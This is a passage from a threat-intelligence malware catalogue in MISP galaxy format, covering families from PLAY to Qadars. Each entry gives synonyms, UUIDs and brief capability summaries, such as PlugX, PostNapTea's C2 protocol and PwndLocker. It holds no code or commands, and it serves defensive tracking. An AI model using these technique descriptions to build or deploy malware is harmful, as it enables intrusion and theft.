"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PLAY.

Known Synonyms
`PlayCrypt`

Internal MISP references

UUID 52cf16fb-aab7-4d93-a624-e12c18064720 which can be used as unique global reference for PLAY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

playwork

Internal MISP references

UUID 5e1f467b-f81e-487c-a911-ab63ae7e9b86 which can be used as unique global reference for playwork in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PLEAD (Windows)

PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PLEAD (Windows).

Known Synonyms
`DRAWDOWN`
`GOODTIMES`
`Linopid`

Internal MISP references

UUID 43a56ed7-8092-4b36-998c-349b02b3bd0d which can be used as unique global reference for PLEAD (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ploutus ATM

Internal MISP references

UUID d91c4184-608e-47b1-b746-0e98587e2455 which can be used as unique global reference for Ploutus ATM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ployx

Internal MISP references

UUID 7bad2f44-93b0-406d-a619-28f14c4bd344 which can be used as unique global reference for ployx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PlugX

RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

Notable features of this malware family are the ability to execute commands on the affected machine to retrieve: machine information capture the screen send keyboard and mouse events keylogging reboot the system manage processes (create, kill and enumerate) manage services (create, start, stop, etc.); and manage Windows registry entries, open a shell, etc.

The malware also logs its events in a text log file.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PlugX.

Known Synonyms
`Destroy RAT`
`Kaba`
`Korplug`
`RedDelta`
`Sogu`
`TIGERPLUG`

Internal MISP references

UUID 036bd099-fe80-46c2-9c4c-e5c6df8dcdee which can be used as unique global reference for PlugX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Plurox

Internal MISP references

UUID 6c8b94fc-f2d4-4347-aa49-4e6daac74314 which can be used as unique global reference for Plurox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pngdowner

Internal MISP references

UUID fb4313ea-1fb6-4766-8b5c-b41fd347e4c5 which can be used as unique global reference for pngdowner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PNGLoad

According to ESET Research, PNGLoad is a second-stage payload deployed by Worok on compromised systems and loaded either by CLRLoad or PowHeartBeat. PNGLoad has capabilities to download and execute additional payloads from a C&C server, which is likely how the attackers have deployed PNGLoad on systems compromised with PowHeartBeat. PNGLoad is a loader that uses bytes from PNG files to create a payload to execute. It is a 64-bit .NET executable - obfuscated with .NET Reactor - that masquerades as legitimate software.

Internal MISP references

UUID f99b030e-7ad5-4983-b28a-43c14efd27c9 which can be used as unique global reference for PNGLoad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PocoDown

uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PocoDown.

Known Synonyms
`Blitz`
`PocoDownloader`

Internal MISP references

UUID 25804d6d-447f-4933-9ba0-876f9d054b68 which can be used as unique global reference for PocoDown in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

poisonplug

According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular poisonplug.

Known Synonyms
`Barlaiy`

Internal MISP references

UUID 3b1c7856-5158-418c-90ad-afda67a66963 which can be used as unique global reference for poisonplug in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poison Ivy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poison Ivy.

Known Synonyms
`SPIVY`
`pivy`
`poisonivy`

Internal MISP references

UUID 7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7 which can be used as unique global reference for Poison Ivy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poison RAT

Internal MISP references

UUID 69605d66-d77e-4e7b-8c64-381e2cd97c14 which can be used as unique global reference for Poison RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poldat

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poldat.

Known Synonyms
`KABOB`
`Zlib`

Internal MISP references

UUID d30d5a0c-cbfb-49c3-99e7-1d6d1888fc2d which can be used as unique global reference for Poldat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PolPo

Internal MISP references

UUID 40a4c426-5a50-4252-89ce-c857788568cc which can be used as unique global reference for PolPo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PolyglotDuke

Internal MISP references

UUID 53371de9-291a-4d33-9fd2-058b43dddd5d which can be used as unique global reference for PolyglotDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Polyglot

Internal MISP references

UUID 5ee77368-5e09-4016-ae73-82b99e830832 which can be used as unique global reference for Polyglot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PolyVice

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PolyVice.

Known Synonyms
`Chily`

Internal MISP references

UUID 31017b7c-c023-4247-b37d-f15f2df5d25a which can be used as unique global reference for PolyVice in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pony

According to KnowBe4, Pony Stealer is a password stealer that can decrypt or unlock passwords for over 110 different applications including VPN, FTP, email, instant messaging, web browsers and much more. Pony Stealer is very dangerous and once it infects a PC it will turn the device into a botnet, allowing it to use the PCs it infects to infect other PCs.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pony.

Known Synonyms
`Fareit`
`Siplog`

Internal MISP references

UUID cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d which can be used as unique global reference for Pony in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PoohMilk Loader

Internal MISP references

UUID 54327cbd-d30c-4684-9a66-18ae36b28399 which can be used as unique global reference for PoohMilk Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POORTRY

According to Mandiant, POORTRY is a malware written as a driver, signed with a Microsoft Windows Hardware Compatibility Authenticode signature. This malware has been observed being used by UNC3944.

Internal MISP references

UUID 17b87423-66e5-451e-8a84-5f4fd8bb2b01 which can be used as unique global reference for POORTRY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PoorWeb

Internal MISP references

UUID e166950b-2d0d-41e1-aee6-ccf0895ce9a5 which can be used as unique global reference for PoorWeb in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Popcorn Time

Internal MISP references

UUID 4ceebc38-f50b-4817-930f-c954d203ff7b which can be used as unique global reference for Popcorn Time in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time - webarchive

Associated metadata

Metadata key	Value
type	[]

PortDoor

Internal MISP references

UUID 7d3b71ff-6dbc-43bb-ae74-9aacdf80783c which can be used as unique global reference for PortDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

portless

Internal MISP references

UUID b813cb80-28ff-4713-abdc-e9a22d397bb4 which can be used as unique global reference for portless in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PortStarter

Internal MISP references

UUID 20b3f812-f81b-4df2-9dbc-de83aa73d24f which can be used as unique global reference for PortStarter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

poscardstealer

Internal MISP references

UUID 5fa166d1-128b-4057-87e3-6676b7d9a7d7 which can be used as unique global reference for poscardstealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

Internal MISP references

UUID 0215eae2-0ab7-4567-8ac6-1be36a7893a6 which can be used as unique global reference for PoshC2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PoSlurp

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoSlurp.

Known Synonyms
`PUNCHTRACK`

Internal MISP references

UUID 15305d8b-55ff-47b2-b1c7-550a8a36ce36 which can be used as unique global reference for PoSlurp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PostNapTea

PostNapTea aka SIGNBT is an HTTP(S) RAT that is written as a complex object-oriented project.

In 2022-2023, it was deployed against targets like a newspaper organization, agriculture-related entity or a software vendor. The initial access was usually achieved by exploiting vulnerabilities in widely-used software in South Korea.

It collects various information about the victim’s computer, such as computer name, product name, OS details, system uptime, CPU information, system locale, time zone, network status, and malware configuration.

PostNapTea uses AES for encryption and decryption ot network traffic. There is a constant prefix SIGNBT occuring in its HTTP POST requests. The prefix is concatenated with 2 characters that identify the communication stage: • LG: logging into the C&C server • KE: acknowledging the succesful login to the C&C • FI: sending the status of a failed operation • SR: sending the status of a successful operation • GC: getting the next command

There are five classes that represent command groups: • CCButton: for file manipulation and screen capturing • CCBitmap: for network commands, implementing functionality of Windows commands often abused by attackers, like sc, reg, arp, net, ver, wmic, ping, whoami, netstat, tracert, lookup, ipconfig, systeminfo, and netsh advfirewall. • CCComboBox: for file system management • CCList: for process management • CCBrush: for control of the malware itself

It stores its configuration in JSON format. It resolves the Windows APIs it requires during runtime, via the Fowler–Noll–Vo (FNV) hash function.

Its internal name in the version-information resource is usually ppcsnap.dll or pconsnap.dll, which loosely inspired its code name.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PostNapTea.

Known Synonyms
`SIGNBT`

Internal MISP references

UUID a31717c0-f25e-4da4-b1a8-84b6fdca2ea1 which can be used as unique global reference for PostNapTea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poulight Stealer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poulight Stealer.

Known Synonyms
`Poullight`

Internal MISP references

UUID e4bcb3e4-17f6-4786-a19b-255c48a07f9a which can be used as unique global reference for Poulight Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Povlsomware

According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.

Internal MISP references

UUID 632001f4-a313-4753-b876-f85df00bc387 which can be used as unique global reference for Povlsomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poweliks

Internal MISP references

UUID 782bee33-9f8d-41df-a608-c014bd6a7de1 which can be used as unique global reference for Poweliks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERBAND

.NET variant of ps1.powerton.

Internal MISP references

UUID ab603f29-9c10-4fb0-9fa3-e123fad11a31 which can be used as unique global reference for POWERBAND in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerCat

Internal MISP references

UUID f19e4583-e14d-41b7-9b7a-2bd7eeffd4b1 which can be used as unique global reference for PowerCat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerDuke

Internal MISP references

UUID c79f5876-e3b9-417a-8eaf-8f1b01a0fecd which can be used as unique global reference for PowerDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

powerkatz

Internal MISP references

UUID 9e3aaf82-268b-47d1-b953-3799c5e1f475 which can be used as unique global reference for powerkatz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerLoader

Internal MISP references

UUID de96ba83-27ec-434c-b77f-7a06820b6e78 which can be used as unique global reference for PowerLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerPool

Internal MISP references

UUID 02e5196e-f7ac-490a-9a92-d4865740016b which can be used as unique global reference for PowerPool in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerShellRunner

Internal MISP references

UUID 1e2dfce6-1e38-4cff-a78e-b43a442ae8e6 which can be used as unique global reference for PowerShellRunner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Powersniff

A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Powersniff.

Known Synonyms
`PUNCHBUGGY`

Internal MISP references

UUID 519d07f5-bea3-4360-8aa5-f9fcdb79cb52 which can be used as unique global reference for Powersniff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerRatankba

QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\windows\temp\

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PowerRatankba.

Known Synonyms
`QUICKRIDE.POWER`

Internal MISP references

UUID 606f778a-8b99-4880-8da8-b923651d627b which can be used as unique global reference for PowerRatankba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

prb_backdoor

Internal MISP references

UUID 2c9c42bc-8f26-4122-9454-a7eed8cd8886 which can be used as unique global reference for prb_backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Predator The Thief

Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.

Internal MISP references

UUID 54041c03-5714-4247-9226-3c801f59bc07 which can be used as unique global reference for Predator The Thief in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prestige

According to PCrisk, Prestige is ransomware - malware that prevents victims from accessing (opening) their files by encrypting them. Additionally, Prestige appends the ".enc" extension to filenames and drops the "README" file containing a ransom note. An example of how this ransomware modifies filenames: it renames "1.jpg" to "1.jpg.enc", "2.png" to "2.png.enc", and so forth.

Internal MISP references

UUID 156b617e-2ae4-47a8-9498-6343b24cc6fe which can be used as unique global reference for Prestige in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prikormka

Internal MISP references

UUID 00764634-4a21-4c5c-8b1f-fb294c9bdd3f which can be used as unique global reference for Prikormka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prilex

Internal MISP references

UUID a0899fec-161d-4ba8-9594-8b5620c21705 which can be used as unique global reference for Prilex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PrincessLocker

Internal MISP references

UUID 0714a7ad-45cb-44ec-92f9-2e839fd8a6b8 which can be used as unique global reference for PrincessLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PrivateLoader

According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.

Internal MISP references

UUID dc62452c-a563-4a98-a4cd-174a7125e566 which can be used as unique global reference for PrivateLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PRIVATELOG

Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.

Internal MISP references

UUID 41bd3db9-a6f2-49b4-966a-3c710827fa82 which can be used as unique global reference for PRIVATELOG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Project Hook POS

Internal MISP references

UUID d0c7815d-6039-436f-96ef-0767aabbdb36 which can be used as unique global reference for Project Hook POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ProjectWood

Internal MISP references

UUID c8513379-2be1-4802-87b6-50482f4dabd7 which can be used as unique global reference for ProjectWood in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prometei (Windows)

According to Lior Rochberger, Cybereason, prometei is a modular and multi-stage cryptocurrency botnet. It was discovered in July 2020, Cybereason Nocturnus team found evidence that this Prometei has been evolved since 2016. There are Linux and Windows versions of this malware.

Internal MISP references

UUID eddb73d8-a33b-4cc6-b1d5-4697f2f4d0ee which can be used as unique global reference for Prometei (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prometheus

Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.

Internal MISP references

UUID 5b5f10bf-2bbe-4019-810c-69eba58ebc81 which can be used as unique global reference for Prometheus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

proteus

Internal MISP references

UUID 6d5724c6-646f-498a-b810-a6cee20f2b3c which can be used as unique global reference for proteus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Proto8RAT

Internal MISP references

UUID 2f5797e7-fe30-4d23-9fbe-4092d53b1660 which can be used as unique global reference for Proto8RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ProtonBot

Internal MISP references

UUID 03f30d04-4568-4c4c-88d6-b62efc72f33a which can be used as unique global reference for ProtonBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prynt Stealer

Internal MISP references

UUID 09a1c6e8-c99f-4648-8210-08c25183f537 which can be used as unique global reference for Prynt Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PseudoManuscrypt

According to PCrisk, PseudoManuscrypt is the name of the malware that spies on victims. It is similar to another malware called Manuscrypt. We have discovered PseudoManuscrypt while checking installers for pirated software (one of the examples is a fake pirated installer for SolarWinds - a network monitoring software).

Internal MISP references

UUID bae89d64-30ce-4bfd-937b-0ec4ac846f60 which can be used as unique global reference for PseudoManuscrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PsiX

According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.

In binaries, apart from BotModule and MainModule, references to the following Modules have be observed: BrowserModule BTCModule ComplexModule KeyLoggerModule OutlookModule ProcessModule RansomwareModule SkypeModule

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PsiX.

Known Synonyms
`PsiXBot`

Internal MISP references

UUID 416ae41e-17b2-46f6-847b-2831a0b3f8e9 which can be used as unique global reference for PsiX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PSLogger

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PSLogger.

Known Synonyms
`ECCENTRICBANDWAGON`

Internal MISP references

UUID 1b1d3548-08db-4dff-878f-77d2f0b69777 which can be used as unique global reference for PSLogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PC Surveillance System

Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PC Surveillance System.

Known Synonyms
`PSS`

Internal MISP references

UUID e437f01c-8040-4098-a3fa-20154b58c928 which can be used as unique global reference for PC Surveillance System in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pteranodon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pteranodon.

Known Synonyms
`Pterodo`

Internal MISP references

UUID d5138738-846e-4466-830c-cd2bb6ad09cf which can be used as unique global reference for Pteranodon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PUBLOAD

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PUBLOAD.

Known Synonyms
`ClaimLoader`
`PUBLOAD`

Internal MISP references

UUID db8f94e9-768d-4ad1-befb-55b4b820174f which can be used as unique global reference for PUBLOAD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PubNubRAT

Internal MISP references

UUID bcc8e3ef-fc5e-4d44-9011-4d429bac0f26 which can be used as unique global reference for PubNubRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Punkey POS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Punkey POS.

Known Synonyms
`poscardstealer`
`pospunk`
`punkeypos`

Internal MISP references

UUID 57a6dbce-2d8a-44ae-a561-282d02935698 which can be used as unique global reference for Punkey POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pupy (Windows)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular pupy (Windows).

Known Synonyms
`Patpoopy`

Internal MISP references

UUID 8a789016-5f8d-4cd9-ba96-ba253db42fd8 which can be used as unique global reference for pupy (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PureCrypter

According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products PureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format

Internal MISP references

UUID 554993dc-2a30-43d9-ac96-fc9b9cca29f6 which can be used as unique global reference for PureCrypter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PureLocker

ransomware

Internal MISP references

UUID 7a0f3f15-6920-4bc0-baa1-17dd8263948e which can be used as unique global reference for PureLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PureLogs Stealer

PureLogs, also known as PureLog Stealer, is an infostealer malware from the Pure family that aims to steal sensitive information from infected devices.

Internal MISP references

UUID 02cd0480-5de3-4a61-9df8-376a4202b66b which can be used as unique global reference for PureLogs Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PurpleFox

Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it's components.

Upon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability.

The latest version of Purple Fox abuses open-source code to enable it's rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.

Internal MISP references

UUID 31638e2b-1c6b-47b9-bbb9-7316f206b354 which can be used as unique global reference for PurpleFox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

purpleink

Internal MISP references

UUID dce38032-f18c-46a6-8e64-d7c0bbbed1f0 which can be used as unique global reference for purpleink in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PurpleWave

ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.

The author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.

Internal MISP references

UUID 0b63109b-0b4d-4f5d-a475-c91af4eed857 which can be used as unique global reference for PurpleWave in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pushdo

Pushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.

Internal MISP references

UUID b39ffc73-db5f-4a8a-acd2-bee958d69155 which can be used as unique global reference for Pushdo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Putabmow

Internal MISP references

UUID b0cb81bc-5d97-454a-8eee-4e81328c7228 which can be used as unique global reference for Putabmow in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow - webarchive

Associated metadata

Metadata key	Value
type	[]

puzzlemaker

The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack.

Internal MISP references

UUID 2c835470-1bd2-4bd6-a83b-e9c3e12fa0ad which can be used as unique global reference for puzzlemaker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PvzOut

Internal MISP references

UUID 52932caa-2fac-4eeb-88de-b3e143db010e which can be used as unique global reference for PvzOut in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PwndLocker

PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PwndLocker.

Known Synonyms
`ProLock`

Internal MISP references

UUID fe0cf4ab-f151-4549-8127-f669c319d546 which can be used as unique global reference for PwndLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pwnpos

Internal MISP references

UUID c903627c-90f6-44ee-9750-4bb44bdbceab which can be used as unique global reference for pwnpos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.pyfiledel

Py2exe built worm propagating via USB drives, having wiper features embedded in the logic (based on today's date being later than 2016-04-03 and existence of a file C:\txt.txt)

Internal MISP references

UUID ea8f44b0-6940-42e0-a93f-77a6b572b140 which can be used as unique global reference for win.pyfiledel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pykspa

According to Akamai, Pykspa is a worm that spreads via Skype by sending messages to other Skype users with download links. Once downloaded, Pykspa extracts personal information and communicates with its command and control servers (C2) using a domain generation algorithm (DGA).

Internal MISP references

UUID 3f0e7db1-5944-4137-89d1-d36940f596d2 which can be used as unique global reference for Pykspa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PyLocky

PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PyLocky.

Known Synonyms
`Locky Locker`

Internal MISP references

UUID 3a5775d3-7d4a-4795-b1b1-7a340030d490 which can be used as unique global reference for PyLocky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PyXie

Full-featured Python RAT compiled into an executable.

PyXie RAT functionality includes: * Man-in-the-middle (MITM) Interception * Web-injects * Keylogging * Credential harvesting * Network Scanning * Cookie theft * Clearing logs * Recording video * Running arbitrary payloads * Monitoring USB drives and exfiltrating data * WebDav server * Socks5 proxy * Virtual Network Connection (VNC) * Certificate theft * Inventorying software * Enumerating the domain with Sharphound

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PyXie.

Known Synonyms
`PyXie RAT`

Internal MISP references

UUID 41217f01-2b03-41c1-88fc-cda1eee65f75 which can be used as unique global reference for PyXie in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Qaccel

Internal MISP references

UUID f4980a75-f72c-4925-8ff5-118b32dd5eaa which can be used as unique global reference for Qaccel in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel - webarchive

Associated metadata

Metadata key	Value
type	[]

Qadars

Internal MISP references

